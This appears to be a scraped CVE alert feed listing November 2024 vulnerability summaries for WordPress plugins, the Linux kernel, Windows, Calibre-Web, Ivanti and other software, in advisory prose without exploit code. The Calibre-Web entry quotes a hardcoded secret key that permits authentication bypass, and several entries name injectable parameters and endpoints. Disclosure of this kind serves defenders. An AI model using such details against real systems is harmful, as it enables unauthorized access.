🚨 CVE-2024-8979The Essential Addons for Elementor – Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.9 via the 'init_content_lostpassword_user_email_controls' function. This makes it possible for authenticated attackers, with Author-level access and above, to extract sensitive data including usernames and passwords of any user, including Administrators, as long as that user opens the email notification for a password change request and images are not blocked by the email client.🎖@cveNotify |
|
| 2024-11-19 17:07:33 |
🚨 CVE-2024-8961The Essential Addons for Elementor – Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘nomore_items_text’ parameter in all versions up to, and including, 6.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-19 17:07:32 |
🚨 CVE-2024-11150The WordPress User Extra Fields plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_tmp_uploaded_file() function in all versions up to, and including, 16.6. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).🎖@cveNotify |
|
| 2024-11-19 16:37:53 |
🚨 CVE-2024-52944An issue was discovered in Veritas Enterprise Vault before 15.1 UPD882911, ZDI-CAN-24698. It allows an authenticated remote attacker to inject a parameter into an HTTP request, allowing for Cross-Site Scripting while viewing archived content. This could reflect back to an authenticated user without sanitization if executed by that user.🎖@cveNotify |
|
| 2024-11-19 16:37:52 |
🚨 CVE-2024-52867guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build outputs are accessible by local users before file metadata concerns (e.g., for setuid and setgid programs) are properly addressed. The vulnerability can be remediated within the product via certain pull, reconfigure, and restart actions. Both 5ab3c4c and 5582241 are needed to resolve the vulnerability.🎖@cveNotify |
|
| 2024-11-19 16:37:51 |
🚨 CVE-2017-13314In setAllowOnlyVpnForUids of NetworkManagementService.java, there is a possible security settings bypass due to a missing permission check. This could lead to local escalation of privilege allowing users to access non-VPN networks, when they are supposed to be restricted to the VPN networks, with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-19 16:37:50 |
🚨 CVE-2017-13313In ElementaryStreamQueue::dequeueAccessUnitMPEG4Video of ESQueue.cpp, there is a possible infinite loop leading to resource exhaustion due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-11-19 16:37:47 |
🚨 CVE-2024-10397A malicious server can crash the OpenAFS cache manager and other clientutilities, and possibly execute arbitrary code.🎖@cveNotify |
|
| 2024-11-19 16:37:46 |
🚨 CVE-2024-10394A local user can bypass the OpenAFS PAG (Process Authentication Group)throttling mechanism in Unix clients, allowing the user to create a PAG usingan existing id number, effectively joining the PAG and letting the user stealthe credentials in that PAG.🎖@cveNotify |
|
| 2024-11-19 16:37:45 |
🚨 CVE-2024-21541All versions of the package dom-iterator are vulnerable to Arbitrary Code Execution due to use of the Function constructor without complete input sanitization. Function generates a new function body and thus care must be given to ensure that the inputs to Function are not attacker-controlled. The risks involved are similar to that of allowing attacker-controlled input to reach eval.🎖@cveNotify |
|
| 2024-11-19 16:37:42 |
🚨 CVE-2024-50210In the Linux kernel, the following vulnerability has been resolved:posix-clock: posix-clock: Fix unbalanced locking in pc_clock_settime()If get_clock_desc() succeeds, it calls fget() for the clockid's fd,and get the clk->rwsem read lock, so the error path should releasethe lock to make the lock balance and fput the clockid's fd to makethe refcount balance and release the fd related resource.However the below commit left the error path locked behind resulting inunbalanced locking. Check timespec64_valid_strict() beforeget_clock_desc() to fix it, because the "ts" is not changedafter that.[pabeni@redhat.com: fixed commit message typo]🎖@cveNotify |
|
| 2024-11-19 16:37:41 |
🚨 CVE-2024-50207In the Linux kernel, the following vulnerability has been resolved:ring-buffer: Fix reader locking when changing the sub buffer orderThe function ring_buffer_subbuf_order_set() updates eachring_buffer_per_cpu and installs new sub buffers that match the requestedpage order. This operation may be invoked concurrently with readers thatrely on some of the modified data, such as the head bit (RB_PAGE_HEAD), orthe ring_buffer_per_cpu.pages and reader_page pointers. However, noexclusive access is acquired by ring_buffer_subbuf_order_set(). Modifyingthe mentioned data while a reader also operates on them can then result inincorrect memory access and various crashes.Fix the problem by taking the reader_lock when updating a specificring_buffer_per_cpu in ring_buffer_subbuf_order_set().🎖@cveNotify |
|
| 2024-11-19 16:37:40 |
🚨 CVE-2024-50203In the Linux kernel, the following vulnerability has been resolved:bpf, arm64: Fix address emission with tag-based KASAN enabledWhen BPF_TRAMP_F_CALL_ORIG is enabled, the address of a bpf_tramp_imagestruct on the stack is passed during the size calculation pass andan address on the heap is passed during code generation. This maycause a heap buffer overflow if the heap address is tagged becauseemit_a64_mov_i64() will emit longer code than it did during the sizecalculation pass. The same problem could occur without tag-basedKASAN if one of the 16-bit words of the stack address happened tobe all-ones during the size calculation pass. Fix the problem byassuming the worst case (4 instructions) when calculating the sizeof the bpf_tramp_image address emission.🎖@cveNotify |
|
| 2024-11-19 16:07:39 |
🚨 CVE-2024-10877The AFI – The Easiest Integration Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.92.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-19 16:07:33 |
🚨 CVE-2024-52268Cross-site scripting vulnerability exists in VK All in One Expansion Unit versions prior to 9.100.1.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is accessing the web site using the product.🎖@cveNotify |
|
| 2024-11-19 16:07:32 |
🚨 CVE-2024-1367A command injection vulnerability exists where an authenticated, remote attacker with administrator privileges on the Security Center application could modify Logging parameters, which could lead to the execution of arbitrary code on the Security Center host.🎖@cveNotify |
|
| 2024-11-19 16:07:31 |
🚨 CVE-2016-7514The ReadPSDChannelPixels function in coders/psd.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PSD file.🎖@cveNotify |
|
| 2024-11-19 15:37:33 |
🚨 CVE-2022-1226A Cross-Site Scripting (XSS) vulnerability in phpipam/phpipam versions prior to 1.4.7 allows attackers to execute arbitrary JavaScript code in the browser of a victim. This vulnerability affects the import Data set feature via a spreadsheet file upload. The affected endpoints include import-vlan-preview.php, import-subnets-preview.php, import-vrf-preview.php, import-ipaddr-preview.php, import-devtype-preview.php, import-devices-preview.php, and import-l2dom-preview.php. The vulnerability can be exploited by uploading a specially crafted spreadsheet file containing malicious JavaScript payloads, which are then executed in the context of the victim's browser. This can lead to defacement of websites, execution of malicious JavaScript code, stealing of user cookies, and unauthorized access to user accounts.🎖@cveNotify |
|
| 2024-11-19 15:37:26 |
🚨 CVE-2022-31670Harbor fails to validate the user permissions when updating tag retention policies. By sending a request to update a tag retention policy with an id that belongs to a project that the currently authenticated user doesn’t have access to, the attacker could modifytag retention policies configured in other projects.🎖@cveNotify |
|
| 2024-11-19 15:37:25 |
🚨 CVE-2022-31668Harbor fails to validate the user permissions when updating p2p preheat policies. By sending a request to update a p2p preheat policy with an id that belongs to a project that the currently authenticated user doesn't have access to, the attacker could modify p2p preheat policies configured in other projects.🎖@cveNotify |
|
| 2024-11-19 15:37:24 |
🚨 CVE-2022-31667Harbor fails to validate the user permissions when updating a robot account that belongs to a project that the authenticated user doesn’t have access to. By sending a request that attempts to update a robot account, and specifying a robot account id and robot account name that belongs to a different project that the user doesn’t have access to, it was possible to revoke the robot account permissions.🎖@cveNotify |
|
| 2024-11-19 14:07:46 |
🚨 CVE-2024-23715In PMRWritePMPageList of pmr.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-19 14:07:45 |
🚨 CVE-2022-2525Improper Restriction of Excessive Authentication Attempts in GitHub repository janeczku/calibre-web prior to 0.6.20.🎖@cveNotify |
|
| 2024-11-19 14:07:44 |
🚨 CVE-2022-30765Calibre-Web before 0.6.18 allows user table SQL Injection.🎖@cveNotify |
|
| 2024-11-19 14:07:40 |
🚨 CVE-2022-0939Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.🎖@cveNotify |
|
| 2024-11-19 14:07:39 |
🚨 CVE-2022-0767Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.🎖@cveNotify |
|
| 2024-11-19 14:07:35 |
🚨 CVE-2022-0766Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.🎖@cveNotify |
|
| 2024-11-19 14:07:34 |
🚨 CVE-2022-0352Cross-site Scripting (XSS) - Reflected in Pypi calibreweb prior to 0.6.16.🎖@cveNotify |
|
| 2024-11-19 14:07:33 |
🚨 CVE-2021-4164calibre-web is vulnerable to Cross-Site Request Forgery (CSRF)🎖@cveNotify |
|
| 2024-11-19 14:07:30 |
🚨 CVE-2021-4171calibre-web is vulnerable to Business Logic Errors🎖@cveNotify |
|
| 2024-11-19 14:07:29 |
🚨 CVE-2021-25964In “Calibre-web” application, v0.6.0 to v0.6.12, are vulnerable to Stored XSS in “Metadata”. An attacker that has access to edit the metadata information, can inject JavaScript payload in the description field. When a victim tries to open the file, XSS will be triggered.🎖@cveNotify |
|
| 2024-11-19 14:07:28 |
🚨 CVE-2020-12627Calibre-Web 0.6.6 allows authentication bypass because of the 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT' hardcoded secret key.🎖@cveNotify |
|
| 2024-11-19 12:37:24 |
🚨 CVE-2024-11194The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a misconfigured check on the 'rtcl_import_settings' function in all versions up to, and including, 3.1.15.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited arbitrary options on the WordPress site. This can be leveraged to update the Subscriber role with Administrator-level capabilities to gain administrative user access to a vulnerable site. The vulnerability is limited in that the option updated must have a value that is an array.🎖@cveNotify |
|
| 2024-11-19 11:37:49 |
🚨 CVE-2024-11195The Email Subscription Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's print_email_subscribe_form shortcode in all versions up to, and including, 1.2.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-19 11:37:48 |
🚨 CVE-2024-11036The The GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via gamipress_get_user_earnings AJAX action in all versions up to, and including, 7.1.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-11-19 09:37:57 |
🚨 CVE-2024-31141Files or Directories Accessible to External Parties, Improper Privilege Management vulnerability in Apache Kafka Clients.Apache Kafka Clients accept configuration data for customizing behavior, and includes ConfigProvider plugins in order to manipulate these configurations. Apache Kafka also provides FileConfigProvider, DirectoryConfigProvider, and EnvVarConfigProvider implementations which include the ability to read from disk or environment variables.In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use these ConfigProviders to read arbitrary contents of the disk and environment variables.In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment access, which may be undesirable in certain environments, including SaaS products.This issue affects Apache Kafka Clients: from 2.3.0 through 3.5.2, 3.6.2, 3.7.0.Users with affected applications are recommended to upgrade kafka-clients to version >=3.8.0, and set the JVM system property "org.apache.kafka.automatic.config.providers=none".Users of Kafka Connect with one of the listed ConfigProvider implementations specified in their worker config are also recommended to add appropriate "allowlist.pattern" and "allowed.paths" to restrict their operation to appropriate bounds.For users of Kafka Clients or Kafka Connect in environments that trust users with disk and environment variable access, it is not recommended to set the system property.For users of the Kafka Broker, Kafka MirrorMaker 2.0, Kafka Streams, and Kafka command-line tools, it is not recommended to set the system property.🎖@cveNotify |
|
| 2024-11-19 08:37:25 |
🚨 CVE-2024-10388The WordPress GDPR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_firstname' and 'gdpr_lastname' parameters in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-19 08:37:24 |
🚨 CVE-2024-10268The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-19 06:37:25 |
🚨 CVE-2024-8403Improper Validation of Specified Type of Input vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5-ENET versions 1.100 and later and FX5-ENET/IP versions 1.100 to 1.104 allows a remote attacker to cause a Denial of Service condition in Ethernet communication of the products by sending specially crafted SLMP packets.🎖@cveNotify |
|
| 2024-11-19 06:37:24 |
🚨 CVE-2024-10103In the process of testing the MailPoet WordPress plugin before 5.3.2, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor🎖@cveNotify |
|
| 2024-11-19 05:37:24 |
🚨 CVE-2024-21539Versions of the package @eslint/plugin-kit before 0.2.3 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by exploiting this vulnerability.🎖@cveNotify |
|
| 2024-11-19 04:07:25 |
🚨 CVE-2024-43598LightGBM Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-19 04:07:24 |
🚨 CVE-2024-43530Windows Update Stack Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-19 03:37:24 |
🚨 CVE-2024-43624Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-19 03:07:24 |
🚨 CVE-2024-43626Windows Telephony Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-19 02:38:00 |
🚨 CVE-2024-50264In the Linux kernel, the following vulnerability has been resolved:vsock/virtio: Initialization of the dangling pointer occurring in vsk->transDuring loopback communication, a dangling pointer can be created invsk->trans, potentially leading to a Use-After-Free condition. Thisissue is resolved by initializing vsk->trans to NULL.🎖@cveNotify |
|
| 2024-11-19 02:37:59 |
🚨 CVE-2024-50159In the Linux kernel, the following vulnerability has been resolved:firmware: arm_scmi: Fix the double free in scmi_debugfs_common_setup()Clang static checker(scan-build) throws below warning: | drivers/firmware/arm_scmi/driver.c:line 2915, column 2 | Attempt to free released memory.When devm_add_action_or_reset() fails, scmi_debugfs_common_cleanup()will run twice which causes double free of 'dbg->name'.Remove the redundant scmi_debugfs_common_cleanup() to fix this problem.🎖@cveNotify |
|
| 2024-11-19 02:37:58 |
🚨 CVE-2024-50152In the Linux kernel, the following vulnerability has been resolved:smb: client: fix possible double free in smb2_set_ea()Clang static checker(scan-build) warning:fs/smb/client/smb2ops.c:1304:2: Attempt to free released memory. 1304 | kfree(ea); | ^~~~~~~~~There is a double free in such case:'ea is initialized to NULL' -> 'first successful memory allocation forea' -> 'something failed, goto sea_exit' -> 'first memory release for ea'-> 'goto replay_again' -> 'second goto sea_exit before allocate memoryfor ea' -> 'second memory release for ea resulted in double free'.Re-initialie 'ea' to NULL near to the replay_again label, it can fix thisdouble free problem.🎖@cveNotify |
|
| 2024-11-19 02:07:25 |
🚨 CVE-2024-9474A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.Cloud NGFW and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-11-19 02:07:24 |
🚨 CVE-2024-1212Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.🎖@cveNotify |
|
| 2024-11-18 23:37:32 |
🚨 CVE-2024-52339Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mage Cast Mage Front End Forms allows Stored XSS.This issue affects Mage Front End Forms: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-11-18 23:37:26 |
🚨 CVE-2024-51940Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in sohelwpexpert WP Responsive Video allows DOM-Based XSS.This issue affects WP Responsive Video: from n/a through 1.0.🎖@cveNotify |
|
| 2024-11-18 23:37:25 |
🚨 CVE-2024-33231Cross Site Scripting vulnerability in Ferozo Email version 1.1 allows a local attacker to execute arbitrary code via a crafted payload to the PDF preview component.🎖@cveNotify |
|
| 2024-11-18 23:37:24 |
🚨 CVE-2022-21712twisted is an event-driven networking engine written in Python. In affected versions twisted exposes cookies and authorization headers when following cross-origin redirects. This issue is present in the `twited.web.RedirectAgent` and `twisted.web. BrowserLikeRedirectAgent` functions. Users are advised to upgrade. There are no known workarounds.🎖@cveNotify |
|
| 2024-11-18 22:37:43 |
🚨 CVE-2024-43640Windows Kernel-Mode Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-18 22:37:37 |
🚨 CVE-2024-43639Windows KDC Proxy Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-18 22:37:36 |
🚨 CVE-2024-43636Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-18 22:37:35 |
🚨 CVE-2024-43635Windows Telephony Service Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-18 22:37:31 |
🚨 CVE-2024-43634Windows USB Video Class System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-18 22:37:30 |
🚨 CVE-2024-43629Windows DWM Core Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-18 22:37:26 |
🚨 CVE-2024-33373An issue in the LB-LINK BL-W1210M v2.0 router allows attackers to bypass password complexity requirements and set single digit passwords for authentication. This vulnerability can allow attackers to access the router via a brute-force attack.🎖@cveNotify |
|
| 2024-11-18 22:37:25 |
🚨 CVE-2024-23672Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-11-18 22:07:25 |
🚨 CVE-2024-3501In lunary-ai/lunary versions up to and including 1.2.5, an information disclosure vulnerability exists due to the inclusion of single-use tokens in the responses of `GET /v1/users/me` and `GET /v1/users/me/org` API endpoints. These tokens, intended for sensitive operations such as password resets or account verification, are exposed to unauthorized actors, potentially allowing them to perform actions on behalf of the user. This issue was addressed in version 1.2.6, where the exposure of single-use tokens in user-facing queries was mitigated.🎖@cveNotify |
|
| 2024-11-18 22:07:24 |
🚨 CVE-2024-49050Visual Studio Code Python Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-18 21:37:32 |
🚨 CVE-2024-50144In the Linux kernel, the following vulnerability has been resolved:drm/xe: fix unbalanced rpm put() with fence_fini()Currently we can call fence_fini() twice if something goes wrong whensending the GuC CT for the tlb request, since we signal the fence andreturn an error, leading to the caller also calling fini() on the errorpath in the case of stack version of the flow, which leads to an extrarpm put() which might later cause device to enter suspend when itshouldn't. It looks like we can just drop the fini() call since thefence signaller side will already call this for us.There are known mysterious splats with device going to sleep even withan rpm ref, and this could be one candidate.v2 (Matt B): - Prefer warning if we detect double fini()(cherry picked from commit cfcbc0520d5055825f0647ab922b655688605183)🎖@cveNotify |
|
| 2024-11-18 21:37:26 |
🚨 CVE-2024-31802DESIGNA ABACUS v.18 and before allows an attacker to bypass the payment process via a crafted QR code.🎖@cveNotify |
|
| 2024-11-18 21:37:25 |
🚨 CVE-2024-23220The issue was addressed with improved handling of caches. This issue is fixed in visionOS 1.1, iOS 17.4 and iPadOS 17.4. An app may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-11-18 21:37:24 |
🚨 CVE-2024-26492An issue in Online Diagnostic Lab Management System 1.0 allows a remote attacker to gain control of a 'Staff' user account via a crafted POST request using the id, email, password, and cpass parameters.🎖@cveNotify |
|
| 2024-11-18 21:07:25 |
🚨 CVE-2024-43627Windows Telephony Service Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-18 21:07:24 |
🚨 CVE-2024-24762`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.🎖@cveNotify |
|
| 2024-11-18 20:37:39 |
🚨 CVE-2024-50970A SQL injection vulnerability in orderview1.php of Itsourcecode Online Furniture Shopping Project 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-11-18 20:37:32 |
🚨 CVE-2024-49028Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-18 20:37:31 |
🚨 CVE-2023-52717Permission verification vulnerability in the lock screen module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-11-18 20:07:31 |
🚨 CVE-2024-50209In the Linux kernel, the following vulnerability has been resolved:RDMA/bnxt_re: Add a check for memory allocation__alloc_pbl() can return error when memory allocation fails.Driver is not checking the status on one of the instances.🎖@cveNotify |
|
| 2024-11-18 19:37:29 |
🚨 CVE-2024-30802An issue in Vehicle Management System 7.31.0.3_20230412 allows an attacker to escalate privileges via the login.html component.🎖@cveNotify |
|
| 2024-11-18 19:37:28 |
🚨 CVE-2024-22083An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. A hardcoded backdoor session ID exists that can be used for further access to the device, including reconfiguration tasks.🎖@cveNotify |
|
| 2024-11-18 19:07:46 |
🚨 CVE-2024-11101A vulnerability was found in 1000 Projects Beauty Parlour Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/search-invoices.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-18 19:07:45 |
🚨 CVE-2024-11100A vulnerability was found in 1000 Projects Beauty Parlour Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-18 19:07:41 |
🚨 CVE-2024-11020Webopac from Grand Vice info has a SQL Injection vulnerability, allowing unauthenticated remote attacks to inject arbitrary SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-11-18 19:07:40 |
🚨 CVE-2024-11017Webopac from Grand Vice info does not properly validate uploaded file types, allowing remote attackers with regular privileges to upload and execute webshells, which could lead to arbitrary code execution on the server.🎖@cveNotify |
|
| 2024-11-18 19:07:35 |
🚨 CVE-2024-10993A vulnerability, which was classified as critical, was found in Codezips Online Institute Management System 1.0. Affected is an unknown function of the file /manage_website.php. The manipulation of the argument website_image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-18 19:07:34 |
🚨 CVE-2024-10990A vulnerability classified as critical was found in SourceCodester Online Veterinary Appointment System 1.0. This vulnerability affects unknown code of the file /admin/services/view_service.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-18 18:37:38 |
🚨 CVE-2024-50329Path traversal in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote unauthenticated attacker to achieve remote code execution. User interaction is required.🎖@cveNotify |
|
| 2024-11-18 18:37:32 |
🚨 CVE-2024-50328SQL injection in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-11-18 18:37:31 |
🚨 CVE-2024-50326SQL injection in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-11-18 18:37:30 |
🚨 CVE-2024-44761An issue in EQ Enterprise Management System before v2.0.0 allows attackers to execute a directory traversal via crafted requests.🎖@cveNotify |
|
| 2024-11-18 18:07:27 |
🚨 CVE-2024-8049In Progress Telerik Document Processing Libraries, versions prior to 2024 Q4 (2024.4.1106), importing a document with unsupported features can lead to excessive processing, leading to excessive use of computing resources leaving the application process unavailable.🎖@cveNotify |
|
| 2024-11-18 18:07:26 |
🚨 CVE-2024-49514Photoshop Desktop versions 24.7.3, 25.11 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-11-18 17:08:08 |
🚨 CVE-2024-51593Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Glopium Studio ???? ????? UAH allows Stored XSS.This issue affects ???? ????? UAH: from n/a through 2.0.🎖@cveNotify |
|
| 2024-11-18 17:08:01 |
🚨 CVE-2024-51668Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mark Tilly MyCurator Content Curation allows Stored XSS.This issue affects MyCurator Content Curation: from n/a through 3.78.🎖@cveNotify |
|
| 2024-11-18 17:08:00 |
🚨 CVE-2024-51663Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Bricksable Bricksable for Bricks Builder allows Stored XSS.This issue affects Bricksable for Bricks Builder: from n/a through 1.6.59.🎖@cveNotify |
|
| 2024-11-18 15:37:33 |
🚨 CVE-2024-35418wac commit 385e1 was discovered to contain a heap overflow via the setup_call function at /wac-asan/wa.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted wasm file.🎖@cveNotify |
|
| 2024-11-18 15:37:26 |
🚨 CVE-2024-35410wac commit 385e1 was discovered to contain a heap overflow via the interpret function at /wac-asan/wa.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted wasm file.🎖@cveNotify |
|
| 2024-11-18 15:37:25 |
🚨 CVE-2024-27528wasm3 139076a suffers from Invalid Memory Read, leading to DoS and potential Code Execution.🎖@cveNotify |
|
| 2024-11-18 15:37:24 |
🚨 CVE-2024-5115707FLYCMS V1.3.9 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://erp.07fly.net:80/oa/OaSchedule/add.html.🎖@cveNotify |
|
| 2024-11-18 15:07:32 |
🚨 CVE-2024-10529The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete GTP assistants.🎖@cveNotify |
|
| 2024-11-18 15:07:26 |
🚨 CVE-2024-50321An infinite loop in Ivanti Avalanche before 6.4.6 allows a remote unauthenticated attacker to cause a denial of service.🎖@cveNotify |
|
| 2024-11-18 15:07:25 |
🚨 CVE-2024-50318A null pointer dereference in Ivanti Avalanche before 6.4.6 allows a remote unauthenticated attacker to cause a denial of service.🎖@cveNotify |
|
| 2024-11-18 15:07:24 |
🚨 CVE-2024-50317A null pointer dereference in Ivanti Avalanche before 6.4.6 allows a remote unauthenticated attacker to cause a denial of service.🎖@cveNotify |
|
| 2024-11-18 14:37:32 |
🚨 CVE-2024-11318An IDOR (Insecure Direct Object Reference) vulnerability has been discovered in AbsysNet, affecting version 2.3.1. This vulnerability could allow a remote attacker to obtain the session of an unauthenticated user by brute-force attacking the session identifier on the "/cgi-bin/ocap/" endpoint.🎖@cveNotify |
|
| 2024-11-18 14:37:26 |
🚨 CVE-2024-11303The pathname of the root directory to a Restricted Directory ('Path Traversal') vulnerability in Korenix JetPort 5601 allows Path Traversal.This issue affects JetPort 5601: through 1.2.🎖@cveNotify |
|
| 2024-11-18 14:37:25 |
🚨 CVE-2024-50809The theme.php file in SDCMS 2.8 has a command execution vulnerability that allows for the execution of system commands🎖@cveNotify |
|
| 2024-11-18 14:37:24 |
🚨 CVE-2024-44765An Improper Authorization (Access Control Misconfiguration) vulnerability in MGT-COMMERCE GmbH CloudPanel v2.0.0 to v2.4.2 allows low-privilege users to bypass access controls and gain unauthorized access to sensitive configuration files and administrative functionality.🎖@cveNotify |
|
| 2024-11-18 13:37:45 |
🚨 CVE-2024-52318Incorrect object recycling and reuse vulnerability in Apache Tomcat.This issue affects Apache Tomcat: 11.0.0, 10.1.31, 9.0.96.Users are recommended to upgrade to version 11.0.1, 10.1.32 or 9.0.97, which fixes the issue.🎖@cveNotify |
|
| 2024-11-18 13:37:44 |
🚨 CVE-2024-3370Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Egebilgi Software Website Template allows SQL Injection.This issue affects Website Template: before 29.04.2024.🎖@cveNotify |
|
| 2024-11-04 06:37:25 |
